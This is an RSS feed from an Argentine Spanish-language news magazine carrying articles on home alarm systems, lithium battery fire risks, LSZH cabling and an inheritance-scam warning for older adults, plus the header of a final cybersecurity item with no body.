<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>prevención &#8211; Todo en un click</title>
	<atom:link href="https://www.todoenunclick.com/tag/prevencion/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.todoenunclick.com</link>
	<description>Magazine Digital de Noticias</description>
	<lastBuildDate>Mon, 20 Apr 2026 14:53:47 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
<site xmlns="com-wordpress:feed-additions:1">74029197</site>	<item>
		<title>¿Cámaras o seguridad? Por qué tu sistema podría fallar</title>
		<link>https://www.todoenunclick.com/camaras-o-seguridad-por-que-tu-sistema-podria-fallar/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 20 Apr 2026 14:53:42 +0000</pubDate>
				<category><![CDATA[Hogar]]></category>
		<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[alarma]]></category>
		<category><![CDATA[cámaras]]></category>
		<category><![CDATA[monitoreo]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[protección]]></category>
		<category><![CDATA[Riesgo]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[sistema]]></category>
		<category><![CDATA[tecnología]]></category>
		<category><![CDATA[verificación]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101885</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="¿Cámaras o seguridad? Por qué tu sistema podría fallar" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Mas-tecnologia.-Mas-riesgos.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>En la Argentina actual, la delincuencia ha evolucionado hacia modalidades más rápidas y oportunistas. Ante este escenario, la <strong>seguridad</strong> ha dejado de ser un complemento para convertirse en una prioridad absoluta. Sin embargo, existe una paradoja: nunca hubo tantos dispositivos instalados y, a la vez, tanta sensación de vulnerabilidad.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El error más común es creer que el equipamiento por sí solo garantiza resultados. Como advierten desde la Cámara Argentina de Seguridad Electrónica (CASEL), el problema no es la falta de tecnología, sino la ausencia de un criterio sistémico para utilizarla.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La seguridad como un sistema de capas</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Para que la protección sea efectiva en un entorno complejo, debe entenderse como un conjunto de engranajes que trabajan en equipo. No es un producto que se compra en una caja, es un proceso.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La estrategia ideal se divide en tres etapas fundamentales:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true} -->
<ol class="wp-block-list"><!-- wp:list-item -->
<li><strong>Prevención (La primera barrera):</strong> Consiste en evitar que el evento ocurra. Una propiedad con buena iluminación, <strong>cámaras</strong> visibles y cartelería de monitoreo disuade al delincuente, quien generalmente busca el objetivo de menor riesgo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Detección anticipada:</strong> Es el punto más débil en muchos hogares argentinos. El objetivo es identificar al intruso antes de que logre vulnerar un acceso. Aquí entran en juego los sensores exteriores y la tecnología perimetral.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Acción y respuesta:</strong> Una vez detectado el movimiento, el sistema debe generar una alerta que sea atendida por humanos capacitados.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:heading -->
<h2 class="wp-block-heading">El riesgo de los kits autoinstalables y el mercado informal</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El mercado actual está saturado de soluciones económicas y dispositivos que prometen protección inmediata sin necesidad de cables ni técnicos. Si bien la <strong>tecnología</strong> es accesible, su eficacia depende de la configuración.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Muchos usuarios adquieren una <strong>alarma</strong> que solo emite un sonido local o envía una notificación al celular que el dueño, por estar durmiendo o trabajando, no llega a ver. Esto genera una falsa sensación de resguardo. La instalación sin certificación técnica puede derivar en fallas críticas justo en el momento en que más se necesita el equipo.</p>
<!-- /wp:paragraph -->

<!-- wp:quote -->
<blockquote class="wp-block-quote"><!-- wp:paragraph -->
<p><em>"La seguridad no es un gasto, es una decisión que empieza por entender que no se trata de tener más dispositivos, sino de tener un sistema que funcione."</em></p>
<!-- /wp:paragraph --></blockquote>
<!-- /wp:quote -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La verificación: ver para decidir</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Uno de los avances más importantes en la industria es la capacidad de <strong>verificación</strong> en tiempo real. Ante un disparo de sensores, el propietario o la central de control pueden acceder a las imágenes instantáneamente.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta capa de inteligencia permite distinguir entre una falsa alarma (causada por una mascota o el clima) y un intento de robo real. La información precisa acelera la toma de decisiones y optimiza el aviso a las fuerzas de seguridad.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">El valor del monitoreo profesional</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Se estima que en Argentina menos del 20% de los sistemas cuentan con <strong>monitoreo</strong> profesional. Esto significa que la gran mayoría de las personas dependen exclusivamente de su propia reacción frente al peligro.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Contar con una central operativa las 24 horas ofrece ventajas que una app por sí sola no puede cubrir:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Validación constante del estado del equipo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Activación de protocolos ante situaciones de estrés.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Gestión de la respuesta operativa inmediata.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Conclusión: una mirada estratégica</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La eficacia de un esquema de protección en la Argentina de hoy no reside en la marca de la cámara o la potencia de la sirena. La verdadera diferencia radica en lo que sucede antes, durante y después de un intento de intrusión. Invertir en seguridad profesional es, en última instancia, invertir en tranquilidad y en la reducción real de riesgos en un contexto donde la improvisación puede salir muy cara.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/camaras-o-seguridad-por-que-tu-sistema-podria-fallar/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101885</post-id>	</item>
		<item>
		<title>Baterías de litio: Guía de prevención y riesgos de incendio</title>
		<link>https://www.todoenunclick.com/baterias-de-litio-guia-de-prevencion-y-riesgos-de-incendio/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 20 Apr 2026 14:38:10 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[alarma]]></category>
		<category><![CDATA[Baterías]]></category>
		<category><![CDATA[detección]]></category>
		<category><![CDATA[fuga]]></category>
		<category><![CDATA[incendio]]></category>
		<category><![CDATA[monitoreo.]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[reciclaje]]></category>
		<category><![CDATA[seguridad]]></category>
		<category><![CDATA[tiempo]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101881</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Baterías de litio: Guía de prevención y riesgos de incendio" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/04/Gemini_Generated_Image_jhac2jjhac2jjhac.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="(max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Las <strong>baterías</strong> de litio-ion han revolucionado nuestra vida cotidiana. Están presentes en nuestros teléfonos, notebooks, monopatines eléctricos y hasta en los sistemas de alarma que protegen nuestro hogar. Sin embargo, su omnipresencia trae consigo un desafío de <strong>seguridad</strong> que no siempre dimensionamos correctamente.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Desde la Cámara Argentina de Seguridad Electrónica (CASEL) advierten que, si bien son eficientes y autónomas, un mal uso o una falla interna pueden convertirlas en una fuente de fuego repentina y devastadora.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">El peligro de la "fuga térmica" en el litio</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El mayor riesgo asociado a esta tecnología es un fenómeno conocido como <strong>fuga</strong> térmica. Este proceso ocurre cuando una celda de la batería entra en un estado de calentamiento incontrolado, liberando gases inflamables y alcanzando temperaturas extremas en cuestión de segundos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Este incidente puede originarse por:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Sobrecargas prolongadas.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Daños físicos o golpes en el dispositivo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Uso de accesorios de carga no certificados.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p><em>"Los incendios provocados por baterías de litio son especialmente peligrosos porque suelen producirse de manera repentina y extenderse en segundos"</em>, señalan desde CASEL, subrayando que la <strong>detección</strong> temprana es el único recurso eficaz una vez iniciado el proceso.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Prevención: hábitos para un uso responsable</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La <strong>prevención</strong> es el primer eslabón para evitar tragedias. Para convivir con esta tecnología de forma segura, es fundamental seguir ciertas pautas de cuidado diario:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true} -->
<ol class="wp-block-list"><!-- wp:list-item -->
<li><strong>Cargadores originales:</strong> Utilice siempre el equipo de carga provisto por el fabricante. Los cargadores genéricos pueden no gestionar correctamente el voltaje.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>No sobrecargar:</strong> Evite dejar dispositivos conectados a la corriente durante toda la noche o por tiempos prolongados una vez alcanzado el 100%.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Inspección visual:</strong> Si nota que una batería está deformada, hinchada o genera un calor excesivo, retírela de circulación de inmediato.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Entorno de carga:</strong> No cargue dispositivos sobre superficies inflamables como camas, sillones o alfombras.</li>
<!-- /wp:list-item --></ol>
<!-- /wp:list -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La importancia de la detección temprana</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>En un escenario donde el fuego se propaga a gran velocidad, el <strong>tiempo</strong> es el factor más crítico. Aquí es donde los sistemas de seguridad electrónica juegan un rol estratégico. Contar con una <strong>alarma</strong> de incendio y detectores de humo correctamente instalados puede marcar la diferencia entre un susto controlado y una pérdida total.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La cultura de la protección integral implica entender que la tecnología que nos facilita la vida también requiere de sistemas que la supervisen. Un detector de humo en el área de carga de monopatines o en la oficina puede salvar vidas al alertar ante la primera emisión de gases de una batería en falla.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Un problema de escala global</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La magnitud del riesgo es real y medible. En el Reino Unido, se registraron más de 300 incendios en 2024 vinculados exclusivamente a bicicletas y monopatines. A nivel global, se estima que para 2026 se desecharán cerca de 78 millones de baterías por día. Sin una conciencia clara sobre el <strong>reciclaje</strong> y el descarte diferenciado, el peligro de <strong>incendio</strong> en hogares y espacios públicos seguirá en aumento.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Conclusión</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La clave no es temer a la tecnología, sino aprender a convivir con ella de manera responsable. La combinación de buenos hábitos, el descarte en puntos autorizados y la inversión en sistemas de detección temprana nos permitirá seguir disfrutando de la autonomía del litio sin poner en riesgo nuestra integridad.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/baterias-de-litio-guia-de-prevencion-y-riesgos-de-incendio/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101881</post-id>	</item>
		<item>
		<title>Nexxt Infraestructura enfatiza la importancia de las cubiertas LSZH para la seguridad contra incendios</title>
		<link>https://www.todoenunclick.com/nexxt-infraestructura-enfatiza-la-importancia-de-las-cubiertas-lszh-para-la-seguridad-contra-incendios/</link>
		
		<dc:creator><![CDATA[Walter Barnes]]></dc:creator>
		<pubDate>Sat, 14 Feb 2026 15:56:48 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[cableado]]></category>
		<category><![CDATA[infraestructura]]></category>
		<category><![CDATA[prevención]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=101644</guid>

					<description><![CDATA[<p><img width="1200" height="675" src="https://www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg?w=1200&amp;ssl=1 1200w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg?resize=284%2C160&amp;ssl=1 284w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg?resize=597%2C336&amp;ssl=1 597w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg?resize=768%2C432&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg?resize=747%2C420&amp;ssl=1 747w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg?resize=640%2C360&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2026/02/Nexxt-Infraestructura-analiza-el-rol-critico-de-los-cables-LSZH-ante-incendios-3.jpg?resize=681%2C383&amp;ssl=1 681w" sizes="(max-width: 1200px) 100vw, 1200px" /></p><!-- wp:paragraph -->
<p>Nexxt Solutions, División Infraestructura, fabricante de soluciones de conectividad y cableado estructurado, analizó el comportamiento de los materiales de cableado ante siniestros, y enfatizó que la elección correcta de las cubiertas de los cables es un factor determinante para la seguridad humana y la continuidad operativa de las empresas.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>"En un incendio, el humo es el principal factor de riesgo para las personas. Las cubiertas tradicionales liberan humo denso y gases tóxicos que reducen la visibilidad y afectan rápidamente la respiración, dificultando la evacuación", explicó <strong>Jesús Alexander Gutiérrez Gómez, Regional Presales Engineer para Latinoamérica y el Caribe de Nexxt Solutions Infraestructura</strong>. "Nuestros cables LSZH, disponibles en versiones LSZH-1 y LSZH-3, están diseñados para emitir muy poco humo y sin gases halógenos tóxicos al exponerse al fuego. Esto mejora las condiciones de evacuación y aporta un nivel adicional de seguridad en edificios con alta concurrencia y entornos corporativos críticos".</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El especialista destacó que la protección va más allá de la integridad física, alcanzando también a los activos digitales. "Durante un incendio, los cables con cubiertas tradicionales pueden liberar gases halógenos que, al mezclarse con la humedad, generan compuestos altamente corrosivos. Estos residuos pueden dañar servidores, switches y cámaras incluso si no fueron alcanzados directamente por el fuego. Las cubiertas LSZH de Nexxt Solutions eliminan este riesgo, reduciendo significativamente la corrosión posterior al siniestro y facilitando una vuelta más rápida a la operación".</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Con respecto a las nuevas tendencias, como el uso de PoE (Power over Ethernet) para iluminación LED y cámaras de alta potencia, <strong>Jesús Alexander Gutiérrez </strong>señaló que el diseño de los materiales es clave para la disipación térmica: "Los cables Nexxt están diseñados para operar de forma segura utilizando materiales y construcciones que favorecen una mejor disipación térmica y un desempeño estable incluso en manojos densos. Al controlar el calor, se reduce el riesgo de sobrecalentamiento que podría contribuir a la propagación de un incendio".</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El Regional Presales Engineer para Latinoamérica y el Caribe de Nexxt Infraestructura también subrayó la importancia de una estrategia integral que incluya accesorios. "La seguridad contra incendios no depende de un solo componente. Nuestras cajas de montaje fabricadas en policarbonato con clasificación UL 94 V-2 aportan resistencia a la llama y reducen la posibilidad de que el punto de terminación se convierta en un foco de propagación. En conjunto con el cableado LSZH, conforman una solución coherente que mejora la resiliencia del edificio".</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Finalmente, en el marco de las crecientes exigencias de seguridad y sostenibilidad en Latinoamérica, el especialista de Nexxt Infraestructurarecordóque el ahorro inicial no debe comprometer la seguridad. "Invertir desde el inicio en soluciones como los cables LSZH asegura que la infraestructura soporte el paso del tiempo y cumpla con regulaciones locales. Priorizar la seguridad y la calidad a largo plazo no solo protege la inversión, sino que evita costos futuros, riesgos legales y daños reputacionales. Un enfoque responsable en la etapa de diseño es siempre más rentable y seguro que el ahorro inmediato", concluyó.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/nexxt-infraestructura-enfatiza-la-importancia-de-las-cubiertas-lszh-para-la-seguridad-contra-incendios/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">101644</post-id>	</item>
		<item>
		<title>Fraude digital: nueva amenaza para adultos mayores</title>
		<link>https://www.todoenunclick.com/fraude-digital-nueva-amenaza-para-adultos-mayores/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 27 May 2025 17:48:11 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[adultos]]></category>
		<category><![CDATA[ciberdelincuencia]]></category>
		<category><![CDATA[engaño]]></category>
		<category><![CDATA[estafa]]></category>
		<category><![CDATA[estafadores]]></category>
		<category><![CDATA[fraude]]></category>
		<category><![CDATA[Herencia]]></category>
		<category><![CDATA[mayores]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[suplantación]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=100568</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Fraude digital: nueva amenaza para adultos mayores" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2025/05/estafa-ancianos.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Los <strong>adultos mayores</strong> argentinos enfrentan una nueva amenaza digital que combina manipulación emocional despiadada con técnicas sofisticadas de <strong>ciberdelincuencia</strong>. Esta <strong>estafa digital</strong> se propaga principalmente a través de <strong>correos electrónicos</strong> y llamadas telefónicas, representando una evolución peligrosa del <strong>fraude</strong> tradicional.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Cómo opera la estafa de la herencia falsa</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>El <strong>modus operandi</strong> de estos <strong>ciberdelincuentes</strong> revela una crueldad calculada. Los atacantes construyen una narrativa devastadora donde se hacen pasar por <strong>estudios jurídicos</strong> respetables, anunciando la supuesta muerte de un pariente lejano que habría dejado una fortuna considerable.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta estrategia explota dos vulnerabilidades humanas fundamentales: la sorpresa ante una pérdida inesperada y la atracción natural hacia una ganancia económica significativa. Los <strong>estafadores</strong> han descubierto que jugar con el luto y la esperanza económica resulta extremadamente efectivo para quebrar las defensas de sus víctimas.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La mecánica del engaño digital</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Los mensajes llegan con un tono profesional que simula formalidad legal, utilizando un lenguaje que genera <strong>urgencia</strong>. Frases como "Mensaje importante" o "Aviso sobre <strong>herencia</strong>" encabezan comunicaciones que deliberadamente evitan proporcionar información específica, manteniendo a la víctima en un estado de confusión controlada.</p>
<!-- /wp:paragraph -->

<!-- wp:heading {"level":3} -->
<h3 class="wp-block-heading">Cuando la víctima responde al anzuelo</h3>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Lo verdaderamente siniestro surge cuando la persona responde al contacto inicial. En ese momento, los <strong>estafadores</strong> despliegan su arsenal completo:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Solicitan documentación personal</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Piden credenciales bancarias</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Requieren códigos de acceso</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>En casos extremos, información biométrica</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Sin embargo, este proceso trasciende la recolección pasiva de datos. Los criminales implementan herramientas tecnológicas maliciosas que otorgan control total sobre los dispositivos de la víctima.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Formularios fraudulentos y páginas falsas</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Los <strong>formularios fraudulentos</strong> representan otra dimensión peligrosa del ataque. Estas páginas web falsas replican perfectamente la apariencia de sitios <strong>bancarios</strong> legítimos, creando una ilusión de seguridad que facilita la entrega voluntaria de información sensible.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Una vez obtenido el acceso, los criminales actúan con velocidad implacable. Las <strong>transferencias</strong> se ejecutan en minutos, vaciando completamente las cuentas disponibles antes de que la víctima comprenda la magnitud del <strong>engaño</strong>.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La suplantación de organismos públicos</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La campaña criminal trasciende el ámbito digital. Los llamados telefónicos complementan la estrategia, donde los <strong>estafadores</strong> se presentan como funcionarios de <strong>PAMI</strong> u otros organismos gubernamentales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Bajo la excusa de "actualizar credenciales" o "validar cuentas", estos contactos telefónicos amplían significativamente el espectro de información recolectada, aprovechando la confianza natural que los <strong>adultos mayores</strong> depositan en las instituciones públicas.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">Personalización: la evolución más peligrosa</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>La personalización representa la evolución más inquietante de esta modalidad delictiva. Los <strong>ciberdelincuentes</strong> investigan activamente las <strong>redes sociales</strong> de sus objetivos, extrayendo:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Nombres de familiares</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Ubicaciones frecuentes</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li>Detalles personales relevantes</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Esta investigación previa otorga una credibilidad devastadora a sus comunicaciones <strong>fraudulentas</strong>, reduciendo dramáticamente las posibilidades de detección temprana.</p>
<!-- /wp:paragraph -->

<!-- wp:heading -->
<h2 class="wp-block-heading">La educación familiar como escudo protector</h2>
<!-- /wp:heading -->

<!-- wp:paragraph -->
<p>Ante esta situación, la <strong>educación familiar</strong> emerge como elemento crucial en la batalla contra el <strong>fraude digital</strong>. Compartir información sobre estas <strong>estafas</strong> con <strong>adultos mayores</strong>, explicar detalladamente las características de estos engaños y establecer protocolos de consulta familiar antes de responder a comunicaciones sospechosas puede marcar la diferencia definitiva.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>La <strong>prevención</strong> sigue siendo la herramienta más poderosa contra estos ataques. Cuando los <strong>adultos mayores</strong> conocen las técnicas utilizadas por los <strong>estafadores</strong>, se convierten en objetivos mucho más difíciles de vulnerar, protegiendo tanto su patrimonio como su tranquilidad emocional.</p>
<!-- /wp:paragraph -->
<p><a href="https://www.todoenunclick.com/fraude-digital-nueva-amenaza-para-adultos-mayores/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">100568</post-id>	</item>
		<item>
		<title>Prevenir es curar: Importancia de la ciberseguridad</title>
		<link>https://www.todoenunclick.com/prevenir-es-curar-importancia-de-la-ciberseguridad/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Tue, 07 May 2024 13:00:00 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[datos]]></category>
		<category><![CDATA[empresas]]></category>
		<category><![CDATA[opinión]]></category>
		<category><![CDATA[prevención]]></category>
		<category><![CDATA[protección]]></category>
		<category><![CDATA[TOTVS]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98812</guid>

